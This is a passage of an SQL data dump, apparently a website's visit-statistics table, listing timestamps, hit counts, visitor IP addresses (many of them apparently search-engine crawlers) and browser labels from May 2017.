.255.65.23','other'),(112003,1495197666,1,0,1,0,'66.249.76.113',''),(112004,1495197699,1,1,0,0,'66.249.66.81','chrome'),(112005,1495197704,1,1,0,0,'217.182.132.15','other'),(112006,1495197870,1,1,0,0,'91.196.178.72','chrome'),(112007,1495197900,1,1,0,0,'217.182.132.87','other'),(112008,1495197963,1,1,0,0,'217.182.132.193','other'),(112009,1495197971,1,1,0,0,'217.182.132.64','other'),(112010,1495198034,1,1,0,0,'91.196.178.68','chrome'),(112011,1495198094,1,1,0,0,'66.102.9.40','chrome'),(112012,1495198550,1,1,0,0,'164.132.161.74','other'),(112013,1495199061,1,1,0,0,'109.236.81.168','chrome'),(112014,1495199120,1,1,0,0,'217.182.132.31','other'),(112015,1495199479,1,1,0,0,'195.162.88.238','chrome'),(112016,1495199733,1,0,1,0,'66.249.76.131',''),(112017,1495199860,1,1,0,0,'217.182.132.27','other'),(112018,1495200099,1,1,0,0,'157.55.39.152','other'),(112019,1495200378,1,0,1,0,'66.249.76.112',''),(112020,1495200397,2,0,2,0,'66.249.66.81',''),(112021,1495200421,1,1,0,0,'217.182.132.28','other'),(112022,1495200861,1,1,0,0,'109.236.81.168','chrome'),(112023,1495200982,1,1,0,0,'51.255.65.69','other'),(112024,1495201214,1,0,1,0,'66.249.66.84',''),(112025,1495201216,1,1,0,0,'217.182.132.50','other'),(112026,1495201247,1,1,0,0,'217.182.132.85','other'),(112027,1495201462,1,1,0,0,'164.132.161.53','other'),(112028,1495201866,1,1,0,0,'91.196.178.37','firefox'),(112029,1495202100,1,0,1,0,'68.180.228.186',''),(112030,1495202325,1,1,0,0,'51.255.65.60','other'),(112031,1495202372,2,2,0,0,'82.207.91.234','firefox'),(112032,1495202474,1,0,1,0,'66.249.76.137',''),(112033,1495202662,1,1,0,0,'109.236.81.168','chrome'),(112034,1495202947,1,1,0,0,'164.132.161.54','other'),(112035,1495203455,1,1,0,0,'217.182.132.56','other'),(112036,1495203840,1,0,1,0,'66.249.66.84',''),(112037,1495203854,1,0,1,0,'68.180.231.24',''),(112038,1495204401,1,1,0,0,'66.249.76.91','chrome'),(112039,1495204522,1,0,1,0,'66.249.66.183',''),(112040,1495204635,1,1,0,0,'164.132.161.51','other'),(112041,1495204924,1,0,1,0,'68.180.228.186',''),(112042,1495204977,1,1,0,0,'217.182.132.67','other'),(112043,1495205112,1,0,1,0,'66.249.76.108',''),(112044,1495205225,1,1,0,0,'217.182.132.75','other'),(112045,1495205348,1,0,1,0,'66.249.66.81',''),(112046,1495206087,1,1,0,0,'66.249.66.180','chrome'),(112047,1495206169,1,1,0,0,'164.132.161.73','other'),(112048,1495206359,3,3,0,0,'91.209.11.236','other'),(112049,1495206420,1,1,0,0,'66.249.76.93','chrome'),(112050,1495206449,1,1,0,0,'164.132.161.74','other'),(112051,1495206776,1,0,1,0,'66.249.66.177',''),(112052,1495207055,1,1,0,0,'217.182.132.148','other'),(112053,1495207154,1,1,0,0,'51.255.65.92','other'),(112054,1495207240,1,1,0,0,'217.182.132.179','other'),(112055,1495207315,1,1,0,0,'8.29.198.26','other'),(112056,1495207506,1,1,0,0,'51.255.65.36','other'),(112057,1495208417,1,1,0,0,'51.255.65.57','other'),(112058,1495208704,1,1,0,0,'217.182.132.191','other'),(112059,1495209136,1,1,0,0,'51.255.65.79','other'),(112060,1495209202,1,1,0,0,'51.255.65.26','other'),(112061,1495209344,1,1,0,0,'217.182.132.147','other'),(112062,1495209525,1,1,0,0,'40.77.167.59','other'),(112063,1495209585,1,1,0,0,'164.132.161.17','other'),(112064,1495209668,1,1,0,0,'217.182.132.156','other'),(112065,1495209782,1,1,0,0,'51.255.71.125','other'),(112066,1495209931,1,0,1,0,'68.180.228.186',''),(112067,1495209993,1,1,0,0,'217.182.132.34','other'),(112068,1495210126,1,1,0,0,'94.178.147.138','chrome'),(112069,1495210207,1,1,0,0,'51.255.71.112','other'),(112070,1495210350,1,1,0,0,'217.182.132.7','other'),(112071,1495210614,1,1,0,0,'91.192.44.153','chrome'),(112072,1495210746,1,1,0,0,'51.255.65.73','other'),(112073,1495210800,1,1,0,0,'217.182.132.181','other'),(112074,1495210862,1,0,1,0,'66.249.76.109',''),(112075,1495210997,1,1,0,0,'91.196.178.167','chrome'),(112076,1495211102,1,1,0,0,'217.182.132.96','other'),(112077,1495211458,3,3,0,0,'91.209.11.236','other'),(112078,1495211532,1,1,0,0,'51.255.65.74','other'),(112079,1495211584,1,1,0,0,'157.55.39.135','other'),(112080,1495212278,1,1,0,0,'216.244.66.237','other'),(112081,1495212670,1,1,0,0,'51.255.65.2','other'),(112082,1495212835,1,1,0,0,'217.182.132.21','other'),(112083,1495213261,1,1,0,0,'217.182.132.83','other'),(112084,1495213909,1,1,0,0,'51.255.65.34','other'),(112085,1495214072,1,1,0,0,'164.132.161.89','other'),(112086,1495214949,1,1,0,0,'151.80.27.118','other'),(112087,1495215286,1,1,0,0,'164.132.161.5','other'),(112088,1495215555,1,1,0,0,'51.255.65.88','other'),(112089,1495215618,1,1,0,0,'157.55.39.152','other'),(112090,1495216128,1,1,0,0,'217.182.132.73','other'),(112091,1495216423,1,1,0,0,'164.132.162.157','other'),(112092,1495217017,1,0,1,0,'68.180.228.186',''),(112093,1495217191,1,1,0,0,'164.132.161.75','other'),(112094,1495217581,3,0,3,0,'66.249.66.81',''),(112095,1495217599,1,0,1,0,'66.249.66.177',''),(112096,1495217648,1,0,1,0,'66.249.76.108',''),(112097,1495217654,1,0,1,0,'66.249.76.89',''),(112098,1495217991,1,1,0,0,'164.132.161.42','other'),(112099,1495218038,1,0,1,0,'66.249.66.183',''),(112100,1495218147,1,1,0,0,'8.29.198.26','other'),(112101,1495218348,1,1,0,0,'95.46.160.249','other'),(112102,1495218374,7,7,0,0,'91.209.11.236','other'),(112103,1495218580,1,1,0,0,'164.132.161.83','other'),(112104,1495218659,1,0,1,0,'66.249.76.107',''),(112105,1495218813,1,1,0,0,'51.255.71.117','other'),(112106,1495219283,1,1,0,0,'217.182.132.179','other'),(112107,1495219310,1,0,1,0,'68.180.231.24',''),(112108,1495219547,3,3,0,0,'91.209.11.236','other'),(112109,1495219615,1,1,0,0,'51.255.71.120','other'),(112110,1495220252,1,1,0,0,'164.132.161.21','other'),(112111,1495220352,1,0,1,0,'66.249.66.183',''),(112112,1495220449,2,2,0,0,'91.209.11.236','other'),(112113,1495220623,1,1,0,0,'94.178.147.138','chrome'),(112114,1495220721,1,1,0,0,'51.255.65.53','other'),(112115,1495220767,1,1,0,0,'51.255.71.113','other'),(112116,1495221048,1,1,0,0,'51.255.65.70','other'),(112117,1495221084,1,1,0,0,'87.250.224.18','other'),(112118,1495221616,1,1,0,0,'51.255.65.224','other'),(112119,1495221797,12,12,0,0,'91.209.11.236','other'),(112120,1495222234,1,1,0,0,'164.132.161.96','other'),(112121,1495222707,1,1,0,0,'164.132.161.38','other'),(112122,1495222857,1,1,0,0,'180.76.15.159','other'),(112123,1495223150,1,1,0,0,'91.209.11.236','other'),(112124,1495223188,1,1,0,0,'164.132.161.27','other'),(112125,1495223194,2,2,0,0,'217.182.132.59','other'),(112126,1495223503,1,1,0,0,'217.182.132.5','other'),(112127,1495223731,1,1,0,0,'164.132.162.157','other'),(112128,1495224080,1,1,0,0,'217.182.132.86','other'),(112129,1495224098,1,1,0,0,'141.8.142.15','other'),(112130,1495224384,1,1,0,0,'164.132.161.48','other'),(112131,1495224790,1,1,0,0,'51.255.65.46','other'),(112132,1495225623,1,1,0,0,'51.255.65.12','other'),(112133,1495225885,1,1,0,0,'91.196.178.134','chrome'),(112134,1495225888,1,1,0,0,'217.182.132.57','other'),(112135,1495226051,1,0,1,0,'66.249.76.91',''),(112136,1495226077,1,1,0,0,'5.9.106.230','other'),(112137,1495226357,1,1,0,0,'95.108.213.34','other'),(112138,1495226885,1,1,0,0,'137.74.207.188','other'),(112139,1495227436,1,0,1,0,'66.249.76.91',''),(112140,1495227449,1,0,1,0,'66.249.66.81',''),(112141,1495227557,1,1,0,0,'51.255.65.59','other'),(112142,1495227884,1,1,0,0,'51.255.65.11','other'),(112143,1495227885,1,1,0,0,'51.255.65.93','other'),(112144,1495227925,1,1,0,0,'164.132.161.35','other'),(112145,1495227929,1,1,0,0,'164.132.161.43','other'),(112146,1495227934,1,1,0,0,'217.69.133.222','other'),(112147,1495228020,1,1,0,0,'217.182.132.4','other'),(112148,1495228405,1,1,0,0,'157.55.39.152','other'),(112149,1495228853,1,1,0,0,'164.132.161.11','other'),(112150,1495228856,1,1,0,0,'217.182.132.57','other'),(112151,1495228973,1,1,0,0,'8.29.198.25','other'),(112152,1495229434,1,0,1,0,'66.249.66.87',''),(112153,1495229645,1,1,0,0,'51.255.71.112','other'),(112154,1495230011,1,1,0,0,'51.255.65.224','other'),(112155,1495230881,1,1,0,0,'217.182.132.151','other'),(112156,1495231960,1,1,0,0,'164.132.161.42','other'),(112157,1495232136,1,1,0,0,'164.132.161.91','other'),(112158,1495232499,1,1,0,0,'137.74.207.188','other'),(112159,1495232680,1,1,0,0,'164.132.161.18','other'),(112160,1495233157,1,1,0,0,'95.221.54.42','other'),(112161,1495233318,1,0,1,0,'66.249.76.93',''),(112162,1495233714,1,1,0,0,'51.255.65.93','other'),(112163,1495233815,1,1,0,0,'51.255.65.46','other'),(112164,1495233950,1,1,0,0,'51.255.65.91','other'),(112165,1495234466,1,0,1,0,'66.249.66.183',''),(112166,1495234741,1,0,1,0,'66.249.76.109',''),(112167,1495234747,1,0,1,0,'66.249.66.87',''),(112168,1495234894,1,1,0,0,'164.132.161.91','other'),(112169,1495235009,1,1,0,0,'107.21.1.8','other'),(112170,1495235105,5,5,0,0,'46.229.168.67','other'),(112171,1495235119,2,2,0,0,'46.229.168.73','other'),(112172,1495235172,1,1,0,0,'46.229.168.66','other'),(112173,1495235175,3,3,0,0,'46.229.168.71','other'),(112174,1495235176,1,1,0,0,'46.229.168.65','other'),(112175,1495235189,2,2,0,0,'46.229.168.69','other'),(112176,1495235203,2,2,0,0,'46.229.168.72','other'),(112177,1495235223,3,3,0,0,'46.229.168.74','other'),(112178,1495235235,4,4,0,0,'46.229.168.68','other'),(112179,1495235304,4,4,0,0,'46.229.168.70','other'),(112180,1495235409,1,1,0,0,'164.132.161.19','other'),(112181,1495235462,1,1,0,0,'46.229.168.75','other'),(112182,1495235823,1,1,0,0,'164.132.162.155','other'),(112183,1495236230,1,0,1,0,'68.180.231.23',''),(112184,1495236282,2,0,2,0,'66.249.76.89',''),(112185,1495236473,1,1,0,0,'157.55.39.152','other'),(112186,1495236701,1,0,1,0,'66.249.76.109',''),(112187,1495236708,1,0,1,0,'66.249.76.107',''),(112188,1495236814,1,0,1,0,'66.249.66.87',''),(112189,1495236932,1,1,0,0,'164.132.161.77','other'),(112190,1495237009,2,2,0,0,'164.132.162.160','other'),(112191,1495237350,1,1,0,0,'51.255.65.57','other'),(112192,1495237623,1,1,0,0,'51.255.65.12','other'),(112193,1495237739,1,1,0,0,'217.182.132.73','other'),(112194,1495237928,1,1,0,0,'51.255.65.87','other'),(112195,1495238186,1,1,0,0,'164.132.161.47','other'),(112196,1495238931,1,1,0,0,'217.182.132.96','other'),(112197,1495239086,1,1,0,0,'164.132.161.29','other'),(112198,1495239529,1,1,0,0,'164.132.161.46','other'),(112199,1495239593,1,0,1,0,'66.249.76.108',''),(112200,1495239794,1,1,0,0,'51.255.65.72','other'),(112201,1495239797,1,1,0,0,'8.29.198.26','other'),(112202,1495239976,1,1,0,0,'51.255.65.17','other'),(112203,1495240196,1,1,0,0,'217.182.132.56','other'),(112204,1495240668,1,0,1,0,'68.180.231.23',''),(112205,1495241133,1,0,1,0,'68.180.230.48',''),(112206,1495241266,1,1,0,0,'217.182.132.27','other'),(112207,1495242028,1,1,0,0,'157.55.39.135','other'),(112208,1495242096,1,0,1,0,'68.180.231.23',''),(112209,1495242315,1,1,0,0,'141.8.142.154','other'),(112210,1495242449,1,1,0,0,'157.55.39.152','other'),(112211,1495242944,1,1,0,0,'157.55.39.86','other'),(112212,1495243245,1,1,0,0,'217.182.132.50','other'),(112213,1495243876,1,0,1,0,'66.249.76.108',''),(112214,1495243900,1,0,1,0,'66.249.76.107',''),(112215,1495243959,1,1,0,0,'51.255.65.82','other'),(112216,1495244182,1,1,0,0,'180.76.15.33','other'),(112217,1495244276,1,0,1,0,'66.249.76.91',''),(112218,1495244783,1,1,0,0,'51.255.65.6','other'),(112219,1495244918,1,1,0,0,'164.132.161.56','other'),(112220,1495245219,1,1,0,0,'217.182.132.4','other'),(112221,1495245619,3,0,3,0,'66.249.76.89',''),(112222,1495245688,1,0,1,0,'66.249.76.109',''),(112223,1495245920,1,0,1,0,'66.249.76.91',''),(112224,1495245924,1,0,1,0,'66.249.66.81',''),(112225,1495246299,1,1,0,0,'164.132.161.66','other'),(112226,1495246618,1,1,0,0,'217.182.132.175','other'),(112227,1495246841,1,1,0,0,'51.255.65.38','other'),(112228,1495247317,1,1,0,0,'217.182.132.240','other'),(112229,1495247662,1,1,0,0,'217.182.132.50','other'),(112230,1495247805,1,1,0,0,'40.77.167.59','other'),(112231,1495248448,1,1,0,0,'217.182.132.88','other'),(112232,1495248750,1,1,0,0,'217.182.132.178','other'),(112233,1495249016,1,1,0,0,'82.145.222.39','other'),(112234,1495249427,1,1,0,0,'40.77.167.59','other'),(112235,1495249531,1,1,0,0,'51.255.65.94','other'),(112236,1495249598,1,0,1,0,'66.249.76.107',''),(112237,1495249629,1,1,0,0,'164.132.161.74','other'),(112238,1495249674,1,1,0,0,'217.69.133.12','other'),(112239,1495250316,1,1,0,0,'164.132.161.55','other'),(112240,1495250626,1,1,0,0,'8.29.198.25','other'),(112241,1495250666,1,1,0,0,'217.182.132.179','other'),(112242,1495250677,1,1,0,0,'217.182.132.67','other'),(112243,1495251001,1,1,0,0,'164.132.161.57','other'),(112244,1495251102,1,1,0,0,'164.132.161.30','other'),(112245,1495251620,1,1,0,0,'51.255.65.28','other'),(112246,1495251833,1,1,0,0,'164.132.161.92','other'),(112247,1495252304,1,1,0,0,'66.249.66.84','chrome'),(112248,1495252670,2,2,0,0,'40.77.167.59','other'),(112249,1495252768,1,1,0,0,'157.55.39.152','other'),(112250,1495252797,1,1,0,0,'164.132.161.12','other'),(112251,1495252905,4,4,0,0,'46.119.125.64','other'),(112252,1495253668,1,1,0,0,'164.132.161.55','other'),(112253,1495253952,1,1,0,0,'141.8.142.154','other'),(112254,1495254161,1,1,0,0,'164.132.162.154','other'),(112255,1495254430,1,1,0,0,'217.182.132.62','other'),(112256,1495254934,1,0,1,0,'66.249.66.87',''),(112257,1495254936,2,0,2,0,'66.249.76.108',''),(112258,1495254948,1,0,1,0,'66.249.66.84',''),(112259,1495254968,1,0,1,0,'66.249.66.177',''),(112260,1495254970,1,0,1,0,'66.249.76.91',''),(112261,1495254975,1,0,1,0,'66.249.76.89',''),(112262,1495255064,1,1,0,0,'217.182.132.175','other'),(112263,1495255102,1,1,0,0,'163.172.108.151','chrome'),(112264,1495255295,1,1,0,0,'51.255.65.46','other'),(112265,1495255337,1,0,1,0,'66.249.76.107',''),(112266,1495255583,1,1,0,0,'217.182.132.154','other'),(112267,1495255785,3,3,0,0,'91.209.11.236','other'),(112268,1495255879,1,1,0,0,'217.182.132.82','other'),(112269,1495256036,1,1,0,0,'217.69.133.28','other'),(112270,1495256143,1,1,0,0,'217.182.132.14','other'),(112271,1495256163,1,1,0,0,'51.255.65.24','other'),(112272,1495256243,1,0,1,0,'66.249.76.89',''),(112273,1495257175,1,1,0,0,'217.182.132.59','other'),(112274,1495258259,1,1,0,0,'51.255.65.64','other'),(112275,1495258380,1,1,0,0,'217.182.132.17','other'),(112276,1495258629,1,1,0,0,'51.255.65.58','other'),(112277,1495258643,1,1,0,0,'51.255.65.46','other'),(112278,1495258644,1,1,0,0,'164.132.161.74','other'),(112279,1495259054,1,1,0,0,'217.182.132.152','other'),(112280,1495259225,1,1,0,0,'51.255.71.123','other'),(112281,1495259320,1,1,0,0,'217.182.132.57','other'),(112282,1495259415,1,1,0,0,'137.74.207.102','other'),(112283,1495259568,1,1,0,0,'51.255.65.89','other'),(112284,1495260058,1,1,0,0,'217.182.132.148','other'),(112285,1495260417,1,1,0,0,'51.255.65.82','other'),(112286,1495260890,1,1,0,0,'157.55.39.135','other'),(112287,1495261185,3,0,3,0,'66.249.76.108',''),(112288,1495261256,1,0,1,0,'68.180.230.48',''),(112289,1495261436,1,1,0,0,'64.246.165.180','firefox'),(112290,1495261465,1,1,0,0,'8.29.198.25','other'),(112291,1495261852,1,0,1,0,'66.249.76.109',''),(112292,1495261853,1,1,0,0,'217.69.133.225','other'),(112293,1495262758,4,4,0,0,'91.209.11.236','other'),(112294,1495262887,1,0,1,0,'66.249.66.87',''),(112295,1495262918,1,0,1,0,'66.249.76.91',''),(112296,1495262930,2,0,2,0,'66.249.76.89',''),(112297,1495263363,1,0,1,0,'66.249.66.81',''),(112298,1495263613,56,56,0,0,'23.235.192.34','other'),(112299,1495263900,2,2,0,0,'91.209.11.236','other'),(112300,1495264219,1,1,0,0,'180.76.15.142','other'),(112301,1495265096,4,4,0,0,'91.209.11.236','other'),(112302,1495265636,1,1,0,0,'69.30.213.82','other'),(112303,1495266229,4,4,0,0,'91.209.11.236','other'),(112304,1495266828,1,0,1,0,'66.249.66.180',''),(112305,1495266908,1,1,0,0,'178.154.149.3','other'),(112307,1495267520,4,4,0,0,'91.209.11.236','other'),(112308,1495268392,1,1,0,0,'217.69.136.207','other'),(112309,1495268606,4,0,4,0,'66.249.76.89',''),(112310,1495268812,3,3,0,0,'91.209.11.236','other'),(112311,1495269497,1,1,0,0,'66.249.76.107','chrome'),(112312,1495269710,1,1,0,0,'217.69.133.232','other'),(112313,1495270057,1,0,1,0,'66.249.76.89',''),(112314,1495271803,2,2,0,0,'91.209.11.236','other'),(112315,1495272292,1,1,0,0,'8.29.198.25','other'),(112316,1495272861,1,0,1,0,'66.249.76.108',''),(112317,1495272906,1,0,1,0,'66.249.76.89',''),(112318,1495273049,1,0,1,0,'66.249.66.81',''),(112319,1495274466,1,1,0,0,'217.69.136.210','other'),(112320,1495274587,2,0,2,0,'66.249.76.93',''),(112321,1495274930,1,1,0,0,'141.8.142.154','other'),(112322,1495275257,1,0,1,0,'66.249.76.89',''),(112323,1495275461,1,0,1,0,'66.249.76.107',''),(112324,1495275591,1,1,0,0,'217.69.133.225','other'),(112325,1495275736,1,0,1,0,'66.249.76.91',''),(112326,1495275857,1,1,0,0,'164.132.161.4','other'),(112327,1495276431,1,1,0,0,'164.132.161.75','other'),(112328,1495276505,1,1,0,0,'164.132.161.95','other'),(112329,1495276764,1,1,0,0,'51.255.65.26','other'),(112330,1495276807,1,1,0,0,'217.69.133.240','other'),(112331,1495276960,1,1,0,0,'95.108.213.34','other'),(112332,1495277109,1,1,0,0,'91.196.178.33','chrome'),(112333,1495277165,2,0,2,0,'66.249.76.91',''),(112334,1495277197,1,1,0,0,'180.76.15.20','other'),(112335,1495277253,1,1,0,0,'51.255.65.59','other'),(112336,1495277458,1,0,1,0,'66.249.66.81',''),(112337,1495277465,1,1,0,0,'141.8.142.154','other'),(112338,1495277470,1,0,1,0,'66.249.66.183',''),(112339,1495277477,1,0,1,0,'66.249.76.93',''),(112340,1495278238,1,1,0,0,'51.255.71.127','other'),(112341,1495278486,1,1,0,0,'217.182.132.18','other'),(112342,1495278744,1,1,0,0,'95.108.213.34','other'),(112343,1495278982,1,0,1,0,'68.180.231.23',''),(112344,1495279269,1,1,0,0,'164.132.161.71','other'),(112345,1495279523,1,0,1,0,'66.249.76.107',''),(112346,1495279941,1,1,0,0,'163.172.108.151','chrome'),(112347,1495280182,2,2,0,0,'88.198.0.163','other'),(112348,1495280258,1,1,0,0,'217.182.132.147','other'),(112349,1495280308,1,1,0,0,'217.69.133.18','other'),(112350,1495280318,1,1,0,0,'51.255.65.67','other'),(112351,1495280384,1,1,0,0,'164.132.161.54','other'),(112352,1495280664,1,1,0,0,'51.255.71.100','other'),(112353,1495280842,1,1,0,0,'164.132.161.70','other'),(112354,1495280855,1,1,0,0,'217.182.132.23','other'),(112355,1495280944,1,1,0,0,'217.182.132.180','other'),(112356,1495281174,1,1,0,0,'217.182.132.241','other'),(112357,1495281211,1,0,1,0,'68.180.230.48',''),(112358,1495281305,1,1,0,0,'51.255.65.32','other'),(112359,1495281371,1,0,1,0,'66.249.66.81',''),(112360,1495281392,1,1,0,0,'217.182.132.181','other'),(112361,1495281407,1,0,1,0,'66.249.76.91',''),(112362,1495281434,1,1,0,0,'51.255.65.19','other'),(112363,1495281759,1,0,1,0,'66.249.76.108',''),(112364,1495281783,1,1,0,0,'51.255.65.90','other'),(112365,1495282869,1,0,1,0,'66.249.66.87',''),(112366,1495282887,2,0,2,0,'66.249.66.81',''),(112367,1495282891,1,0,1,0,'66.249.76.89',''),(112368,1495282898,1,1,0,0,'51.255.65.62','other'),(112369,1495282925,1,1,0,0,'217.182.132.87','other'),(112370,1495283125,1,1,0,0,'8.29.198.25','other'),(112371,1495283287,1,1,0,0,'164.132.161.78','other'),(112372,1495283299,1,1,0,0,'66.249.76.89','chrome'),(112373,1495283833,1,1,0,0,'51.255.65.19','other'),(112374,1495284312,1,0,1,0,'66.249.66.81',''),(112375,1495285877,1,1,0,0,'51.255.65.85','other'),(112376,1495285927,1,1,0,0,'40.77.167.95','other'),(112377,1495285974,1,1,0,0,'217.182.132.77','other'),(112378,1495286172,1,0,1,0,'66.249.76.91',''),(112379,1495286393,1,1,0,0,'137.74.207.101','other'),(112380,1495286551,1,1,0,0,'193.194.127.217','firefox'),(112381,1495286714,1,1,0,0,'217.69.133.13','other'),(112382,1495287163,1,1,0,0,'217.182.132.93','other'),(112383,1495287287,1,1,0,0,'217.69.133.220','other'),(112384,1495287354,1,1,0,0,'164.132.161.77','other'),(112385,1495287609,1,0,1,0,'66.249.76.107',''),(112386,1495287687,1,1,0,0,'217.182.132.28','other'),(112387,1495287971,1,1,0,0,'141.8.142.154','other'),(112388,1495288211,1,0,1,0,'66.249.76.91',''),(112389,1495288603,2,2,0,0,'62.212.73.211','other'),(112390,1495288708,1,1,0,0,'164.132.161.43','other'),(112391,1495288938,1,0,1,0,'66.249.76.107',''),(112392,1495288952,1,0,1,0,'66.249.76.89',''),(112393,1495289834,1,1,0,0,'217.182.132.15','other'),(112394,1495289843,1,1,0,0,'137.74.207.116','other'),(112395,1495289991,1,0,1,0,'66.249.76.109',''),(112396,1495290731,2,0,2,0,'66.249.76.91',''),(112397,1495290735,1,1,0,0,'164.132.161.89','other'),(112398,1495290845,1,1,0,0,'51.255.65.64','other'),(112399,1495291125,1,1,0,0,'51.255.65.33','other'),(112400,1495291490,1,1,0,0,'217.182.132.184','other'),(112401,1495291605,3,3,0,0,'91.209.11.236','other'),(112402,1495291784,1,1,0,0,'164.132.161.8','other'),(112403,1495291979,1,1,0,0,'164.132.161.48','other'),(112404,1495292710,1,0,1,0,'66.249.76.109',''),(112405,1495292766,1,1,0,0,'66.249.66.180','chrome'),(112406,1495292978,1,1,0,0,'185.26.180.94','other'),(112407,1495293068,1,1,0,0,'51.255.65.52','other'),(112408,1495293195,1,1,0,0,'51.255.65.78','other'),(112409,1495293321,1,1,0,0,'164.132.161.93','other'),(112410,1495293559,1,0,1,0,'66.249.66.81',''),(112411,1495293956,1,1,0,0,'8.29.198.27','other'),(112412,1495294034,1,1,0,0,'164.132.161.15','other'),(112413,1495294043,1,1,0,0,'51.255.65.32','other'),(112414,1495294453,1,1,0,0,'51.255.65.27','other'),(112415,1495294928,1,0,1,0,'66.249.76.93',''),(112416,1495294933,1,0,1,0,'66.249.66.81',''),(112417,1495294935,1,0,1,0,'66.249.76.91',''),(112418,1495295370,1,1,0,0,'66.249.76.89','chrome'),(112419,1495296298,1,1,0,0,'217.182.132.93','other'),(112420,1495296582,1,1,0,0,'164.132.161.54','other'),(112421,1495297081,1,1,0,0,'137.74.201.99','other'),(112422,1495297616,1,0,1,0,'66.249.76.109',''),(112423,1495298039,1,1,0,0,'51.255.71.133','other'),(112424,1495298270,1,1,0,0,'164.132.161.13','other'),(112425,1495298376,1,1,0,0,'151.80.27.118','other'),(112426,1495298601,1,0,1,0,'66.249.66.84',''),(112427,1495299100,1,1,0,0,'164.132.161.26','other'),(112428,1495299210,1,1,0,0,'137.74.207.159','other'),(112429,1495299518,1,1,0,0,'217.182.132.29','other'),(112430,1495299832,1,1,0,0,'217.182.132.183','other'),(112431,1495299871,1,1,0,0,'66.249.93.202','chrome'),(112432,1495300063,1,1,0,0,'164.132.161.60','other'),(112433,1495300080,1,1,0,0,'217.182.132.7','other'),(112434,1495300134,2,2,0,0,'164.132.161.45','other'),(112435,1495300621,1,1,0,0,'51.255.65.74','other'),(112436,1495300638,1,1,0,0,'51.255.65.72','other'),(112437,1495300672,53,53,0,0,'133.130.112.147','chrome'),(112438,1495300765,1,1,0,0,'51.255.65.40','other'),(112439,1495301209,1,1,0,0,'137.74.207.102','other'),(112440,1495301370,1,1,0,0,'217.182.132.34','other'),(112441,1495301382,1,1,0,0,'164.132.161.79','other'),(112442,1495301525,1,1,0,0,'51.255.65.37','other'),(112443,1495301586,34,34,0,0,'133.130.112.147','chrome'),(112444,1495302037,1,1,0,0,'51.255.65.93','other'),(112445,1495302113,1,0,1,0,'66.249.76.89',''),(112446,1495302683,1,1,0,0,'217.182.132.178','other'),(112447,1495302690,1,1,0,0,'51.255.65.81','other'),(112448,1495302707,1,1,0,0,'66.249.66.183','chrome'),(112449,1495302965,1,1,0,0,'141.8.142.15','other'),(112450,1495303078,1,1,0,0,'137.74.207.114','other'),(112451,1495303357,1,1,0,0,'164.132.161.50','other'),(112452,1495303977,1,1,0,0,'217.182.132.60','other'),(112453,1495304682,1,0,1,0,'66.249.66.183',''),(112454,1495304792,1,1,0,0,'8.29.198.27','other'),(112455,1495304826,1,1,0,0,'51.255.65.38','other'),(112456,1495304913,1,1,0,0,'51.255.71.111','other'),(112457,1495304966,1,1,0,0,'164.132.161.42','other'),(112458,1495305087,3,3,0,0,'91.209.11.236','other'),(112459,1495305195,1,1,0,0,'217.69.133.226','other'),(112460,1495305215,1,0,1,0,'66.249.76.93',''),(112461,1495305290,1,1,0,0,'51.255.65.23','other'),(112462,1495305573,1,0,1,0,'66.249.76.107',''),(112463,1495305854,1,1,0,0,'164.132.161.25','other'),(112464,1495306084,1,1,0,0,'217.69.133.70','other'),(112465,1495306181,1,1,0,0,'91.209.11.236','other'),(112466,1495307334,1,1,0,0,'164.132.161.9','other'),(112467,1495307641,1,1,0,0,'95.132.1.255','firefox'),(112468,1495308299,1,0,1,0,'66.249.76.93',''),(112469,1495308319,1,0,1,0,'66.249.66.84',''),(112470,1495308338,1,0,1,0,'66.249.66.81',''),(112471,1495308406,1,1,0,0,'157.55.39.152','other'),(112472,1495308512,1,1,0,0,'164.132.164.180','other'),(112473,1495308725,1,1,0,0,'151.80.27.118','other'),(112474,1495309099,1,1,0,0,'164.132.161.55','other'),(112475,1495309423,1,1,0,0,'217.182.132.65','other'),(112476,1495309472,1,1,0,0,'217.182.132.97','other'),(112477,1495309672,1,1,0,0,'40.77.167.59','other'),(112478,1495309895,1,1,0,0,'164.132.161.4','other'),(112479,1495309943,1,1,0,0,'164.132.161.39','other'),(112480,1495310055,1,1,0,0,'217.182.132.35','other'),(112481,1495310732,1,1,0,0,'217.69.133.247','other'),(112482,1495311304,1,1,0,0,'217.182.132.171','other'),(112483,1495311368,1,1,0,0,'5.255.253.4','other'),(112484,1495311799,1,1,0,0,'37.54.21.47','chrome'),(112485,1495311900,1,1,0,0,'217.182.132.157','other'),(112486,1495312758,1,0,1,0,'66.249.76.107',''),(112487,1495313453,1,0,1,0,'68.180.230.48',''),(112488,1495313649,1,1,0,0,'51.255.71.122','other'),(112489,1495313698,1,0,1,0,'66.249.76.108',''),(112490,1495313796,1,0,1,0,'66.249.66.183',''),(112491,1495313994,1,1,0,0,'40.77.167.59','other'),(112492,1495314004,1,1,0,0,'217.182.132.65','other'),(112493,1495314611,1,1,0,0,'137.74.207.101','other'),(112494,1495314662,1,1,0,0,'157.55.39.135','other'),(112495,1495314744,1,1,0,0,'164.132.161.2','other'),(112496,1495315524,1,1,0,0,'217.69.133.23','other'),(112497,1495315651,1,1,0,0,'8.29.198.26','other'),(112498,1495315857,1,1,0,0,'51.255.65.22','other'),(112499,1495316043,1,0,1,0,'66.249.76.89',''),(112500,1495316088,1,0,1,0,'66.249.66.81',''),(112501,1495316230,1,1,0,0,'164.132.161.84','other'),(112502,1495316809,1,1,0,0,'217.182.132.79','other'),(112503,1495316938,1,0,1,0,'66.249.66.84',''),(112504,1495316985,1,0,1,0,'66.249.66.87',''),(112505,1495317520,1,1,0,0,'51.255.71.125','other'),(112506,1495317541,1,1,0,0,'95.28.227.114','msie'),(112507,1495317556,1,1,0,0,'51.255.65.66','other'),(112508,1495317957,1,1,0,0,'51.255.71.119','other'),(112509,1495317959,1,0,1,0,'68.180.230.48',''),(112510,1495317965,1,1,0,0,'51.255.71.130','other'),(112511,1495318094,1,1,0,0,'51.255.65.76','other'),(112512,1495318268,1,1,0,0,'66.249.76.109','chrome'),(112513,1495318836,1,1,0,0,'164.132.161.28','other'),(112514,1495318867,1,0,1,0,'68.180.230.48',''),(112516,1495318992,1,1,0,0,'176.193.106.59','msie'),(112517,1495319132,1,1,0,0,'164.132.161.32','other'),(112518,1495319431,1,1,0,0,'51.255.65.88','other'),(112519,1495319466,1,1,0,0,'164.132.161.80','other'),(112520,1495320012,1,0,1,0,'66.249.66.87',''),(112521,1495320252,1,1,0,0,'164.132.161.59','other'),(112522,1495320311,1,1,0,0,'51.255.71.112','other'),(112523,1495320837,1,1,0,0,